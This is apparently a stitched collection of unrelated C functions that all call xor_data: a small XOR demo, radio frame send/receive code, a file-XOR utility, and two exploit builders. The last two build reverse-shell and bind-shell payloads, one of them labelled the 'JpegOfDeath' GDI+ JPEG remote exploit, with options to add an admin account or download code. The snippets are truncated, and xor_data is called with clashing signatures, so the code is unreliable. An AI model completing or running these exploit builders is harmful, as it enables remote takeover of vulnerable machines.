int main(int argc, char const *argv[])
{
uint8_t key[] = {0x01, 0x02, 0x03, 0x04};
uint8_t data[] = {0x55, 0x66, 0x77};
xor_data(key, data, 3);
printf("%x %x %x\n", data[0], data[1], data[2]);
xor_data(key, data, 3);
printf("%x %x %x\n", data[0], data[1], data[2]);
return 0;
}
int radio_send_state_update(uint8_t sensor_type, uint8_t sensor_index, uint16_t value)
{
radio_state_update_frame frame;
uint8_t *buffer = (uint8_t *)&frame;
memset(&frame, 0, sizeof(frame));
frame.header.source = state.uid;
frame.header.dest = DEST_MASTER;
frame.header.msg_type = SENSOR_MSG_STATE_UPDATE;
frame.sensor_type = sensor_type;
frame.sensor_index = sensor_index;
frame.value = value;
xor_data(buffer, sizeof(frame));
vw_send(buffer, sizeof(frame));
vw_wait_tx();
}
int radio_receive_message(uint8_t *buffer, uint8_t *buflen)
{
if (vw_get_message(buffer, buflen)) // Non-blocking
{
// decrypt
xor_data(buffer, *buflen);
if( *buflen >= sizeof(radio_frame_header) ){
radio_frame_header *header = (radio_frame_header*) buffer;
return header->msg_type;
}
else {
// ignore invalid packets
return 0;
}
}
else {
return 0;
}
}
int main(int argc, char *argv[])
{
int i = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and reverse
attacks */
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char print_raw_exploit = 0;
unsigned char attack_mode = 2; /* bind attack by default */
char ip_addr[256];
char exploit[2048];
char str_num[16];
char *p1, *p2;
FILE *EXPLOIT_FP;
char outfile[512];
WSADATA wsa;
if (argc < 2) print_usage(argv[0]);
/* process commandline */
for (i = 0; i < argc; i++) {
if (argv[i][0] == '-') {
switch (argv[i][1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
case 'b':
/* bind */
attack_mode = 2;
break;
case 'p':
port = atoi(argv[i+1]);
/* port */
break;
case 'o':
print_raw_exploit = 1;
break;
case 'e':
strncpy(outfile, argv[i+1], 256);
}
}
}
/* initialize the socket library */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!\n");
exit(-1);
}
/* build exploit */
strncpy(exploit, injection_vector, strlen(injection_vector));
exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
reverse_shellcode[196] = (char) 0x90;
reverse_shellcode[197] = (char) 0x92;
reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1-ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[191] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
raw_num = atoi(str_num);
reverse_shellcode[192] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
raw_num = atoi(str_num);
reverse_shellcode[193] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[194] = xor_data((char)raw_num);
strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
}
int main(int argc, char **argv)
{
char buf[1024]; /* keep this at 1k or adjust garbage calc below */
FILE *in = stdin;
FILE *out = stdout;
char *ifn = NULL;
char *ofn = NULL;
const char *pattern = default_pattern;
char hex_pattern[128];
unsigned int hex_buf;
int c;
int v0, v1, v2;
size_t n;
int p_len, p_off = 0;
while ((c = getopt(argc, argv, "i:o:p:xh")) != -1) {
switch (c) {
case 'i':
ifn = optarg;
break;
case 'o':
ofn = optarg;
break;
case 'p':
pattern = optarg;
break;
case 'x':
is_hex_pattern = true;
break;
case 'h':
default:
usage();
}
}
if (optind != argc || optind == 1) {
fprintf(stderr, "illegal arg \"%s\"\n", argv[optind]);
usage();
}
if (ifn && !(in = fopen(ifn, "r"))) {
fprintf(stderr, "can not open \"%s\" for reading\n", ifn);
usage();
}
if (ofn && !(out = fopen(ofn, "w"))) {
fprintf(stderr, "can not open \"%s\" for writing\n", ofn);
usage();
}
p_len = strlen(pattern);
if (p_len == 0) {
fprintf(stderr, "pattern cannot be empty\n");
usage();
}
if (is_hex_pattern) {
int i;
if ((p_len / 2) > sizeof(hex_pattern)) {
fprintf(stderr, "provided hex pattern is too long\n");
usage();
}
if (p_len % 2 != 0) {
fprintf(stderr, "the number of characters (hex) is incorrect\n");
usage();
}
for (i = 0; i < (p_len / 2); i++) {
if (sscanf(pattern + (i * 2), "%2x", &hex_buf) < 0) {
fprintf(stderr, "invalid hex digit around %d\n", i * 2);
usage();
}
hex_pattern[i] = (char)hex_buf;
}
}
while ((n = fread(buf, 1, sizeof(buf), in)) > 0) {
if (n < sizeof(buf)) {
if (ferror(in)) {
FREAD_ERROR:
fprintf(stderr, "fread error\n");
return EXIT_FAILURE;
}
}
if (is_hex_pattern) {
p_off = xor_data(buf, n, hex_pattern, (p_len / 2),
p_off);
} else {
p_off = xor_data(buf, n, pattern, p_len, p_off);
}
if (!fwrite(buf, n, 1, out)) {
FWRITE_ERROR:
fprintf(stderr, "fwrite error\n");
return EXIT_FAILURE;
}
}
if (ferror(in)) {
goto FREAD_ERROR;
}
if (fflush(out)) {
goto FWRITE_ERROR;
}
fclose(in);
fclose(out);
return EXIT_SUCCESS;
}
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 1337; // default port for bind and reverse attacks
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char attack_mode = 2; // bind by default
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];
char jpeg_filename[256];
WSADATA wsa;
printf(" +------------------------------------------------+\n");
printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | TweaKed By M4Z3R For GSO |\n");
printf(" | September, 23, 2004 |\n");
printf(" +------------------------------------------------+\n");
if (argc < 2)
print_usage(argv[0]);
// process commandline
for (i = 0; i < (unsigned) argc; i++)
{
if (argv[i][0] == '-')
{
switch (argv[i][1])
{
// reverse connect
case 'r':
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
// bind
case 'b':
attack_mode = 2;
break;
// Add.Admin
case 'a':
attack_mode = 3;
break;
// DL
case 'd':
attack_mode = 4;
break;
// port
case 'p':
port = atoi(argv[i+1]);
break;
}
}
}
strncpy(jpeg_filename, argv[i-1], 255);
fout = fopen(argv[i-1], "wb");
if( !fout ) {
printf("Error: JPEG File %s Not Created!\n", argv[i-1]);
return(EXIT_FAILURE);
}
// initialize the socket library
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!\n");
exit(-1);
}
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1)
{
// reverse connect attack
reverse_shellcode[184] = (char) 0x90;
reverse_shellcode[185] = (char) 0x92;
reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
reverse_shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
reverse_shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[182] = xor_data((char)raw_num);
}
